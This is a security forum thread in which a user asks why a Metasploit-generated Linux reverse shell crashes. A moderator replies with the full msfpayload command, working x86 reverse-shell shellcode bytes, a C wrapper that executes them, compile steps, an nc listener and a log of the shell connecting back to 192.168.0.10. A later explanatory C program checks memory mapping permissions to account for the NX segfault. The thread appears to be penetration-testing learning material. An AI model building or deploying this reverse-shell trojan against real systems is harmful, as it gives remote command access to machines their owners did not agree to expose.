Thread: msfpayload/msfencode

  1. #1 spawn (Good friend of the forums) | Join Date: Jan 2010 | Posts: 280

    msfpayload/msfencode

    Hello there,

    I tried the following:

    msfpayload linux/x86/shell_reverse_tcp LPORT=53 R | msfencode -b '' -t elf -o shell

    but when I execute ./shell

    the following message appears:

    segmentation fault

    In the -b param I also tried -b '\x00'.
    What is wrong?

    I tried on 32 and 64 bit architectures.

    Thanks in advance

  2. #2 lupin (Super Moderator) | Join Date: Jan 2010 | Posts: 2,943

    If your aim is to create a Linux reverse shell binary, you can try the following.

    Code:
    itsecurity@ptlaptop01:~$ /pentest/exploits/framework3/msfpayload linux/x86/shell_reverse_tcp LPORT=1050 LHOST=192.168.0.10 C
    /*
     * linux/x86/shell_reverse_tcp - 71 bytes
     * http://www.metasploit.com
     * LHOST=192.168.0.10, AppendExit=false,
     * PrependSetresuid=false, PrependSetuid=false, LPORT=1050,
     * PrependSetreuid=false
     */
    unsigned char buf[] =
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    "\x5b\x5e\x68\xc0\xa8\x00\x0a\x66\x68\x04\x1a\x66\x53\x6a\x10"
    "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
    "\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

    Then take the C buffer and put it into a C program as follows:

    Code:
    itsecurity@ptlaptop01:~$ cat revbind.c

    /* Payload bytes emitted by msfpayload above. As a writable global this
     * array lives in the data segment, so jumping into it only works where
     * that segment is mapped executable; with NX enabled the call below
     * faults with a segmentation fault instead. */
    char code[] =
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    "\x5b\x5e\x68\xc0\xa8\x00\x0a\x66\x68\x04\x1a\x66\x53\x6a\x10"
    "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
    "\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

    int main(int argc, char **argv)
    {
      /* Treat the byte array as a function and call it. */
      int (*funct)();
      funct = (int (*)()) code;
      (*funct)();
      return 0;
    }
    Compile:

    Code:
    itsecurity@ptlaptop01:~$ gcc revbind.c -o revbind

    Run listener on 192.168.0.10:

    Code:
    itsecurity@ptlaptop01:~$ nc -nvvlp 1050
    listening on [any] 1050 ...

    Run reverse shell trojan:

    Code:
    itsecurity@ptlaptop01:~$ ./revbind

    Go back to listener on 192.168.0.10 and try a few commands:

    Code:
    itsecurity@ptlaptop01:~$ nc -nvvlp 1050
    listening on [any] 1050 ...
    connect to [192.168.0.10] from (UNKNOWN) [192.168.0.10] 47665
    pwd
    /home/itsecurity
    hostname
    ptlaptop01

    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.
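    The thread's question is a segmentation fault when a payload is run as a program, and the C wrapper above jumps into a global char array. One common cause of exactly that fault is a host with NX enabled, where the writable data segment is not mapped executable. The program below is an added example, not code from this thread: on a Linux host with /proc mounted (an assumption), it reads its own /proc/self/maps and reports whether the mapping that holds a given address carries the x bit, without executing any bytes from the buffer.

```c
#include <stdio.h>
#include <stdint.h>

/* Constructed stand-in for the shellcode array: a writable global that
 * lands in the .data segment and holds harmless text. Never executed. */
unsigned char data_buf[] = "constructed sample, never executed";

/* Look up the mapping that contains addr in /proc/self/maps.
 * Returns 1 if that mapping is executable, 0 if it is mapped without the
 * x bit, and -1 if no mapping was found or /proc could not be read. */
int is_executable_mapping(const void *addr)
{
    FILE *maps = fopen("/proc/self/maps", "r");
    char line[512];
    uintptr_t target = (uintptr_t)addr;
    int result = -1;

    if (maps == NULL)
        return -1;
    /* Each line looks like: 00400000-00401000 r-xp 00000000 08:01 1234 /path */
    while (fgets(line, sizeof line, maps) != NULL) {
        unsigned long start, end;
        char perms[5];
        if (sscanf(line, "%lx-%lx %4s", &start, &end, perms) != 3)
            continue;
        if (target >= start && target < end) {
            result = (perms[2] == 'x') ? 1 : 0;
            break;
        }
    }
    fclose(maps);
    return result;
}

/* The two cases of interest: a data buffer versus compiled code. */
int data_buffer_is_executable(void)
{
    return is_executable_mapping(data_buf);
}

int text_segment_is_executable(void)
{
    return is_executable_mapping((const void *)&is_executable_mapping);
}

int main(void)
{
    printf("data buffer (.data): %d\n", data_buffer_is_executable());
    printf("function (.text):    %d\n", text_segment_is_executable());
    return 0;
}
```

    On a typical NX-enabled Linux build the data buffer reports 0 and the function reports 1, which is why a jump into the array faults there while a mapping created with execute permission would not.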

  3. #3 spawn (Good friend of the forums) | Join Date: Jan 2010 | Posts: 280

    I will go and try it.
    Thanks Lupin...
    Can you point me to manuals or something that explains msfencode and payloads in depth?

    Thanks in advance

  4. #4 lupin (Super Moderator) | Join Date: Jan 2010 | Posts: 2,943

    Quote Originally Posted by spawn:
    > Can you point me to manuals or something that explains msfencode and payloads in depth?

    There's some detail about them in the Metasploit Developer Guide, but whether it's what you're after...

  5. #5 spawn (Good friend of the forums) | Join Date: Jan 2010 | Posts: 280

    Again, thanks.
    In Metasploit Unleashed I see one example too.
    Thanks.
    I need to program;
    that is what I am lacking.
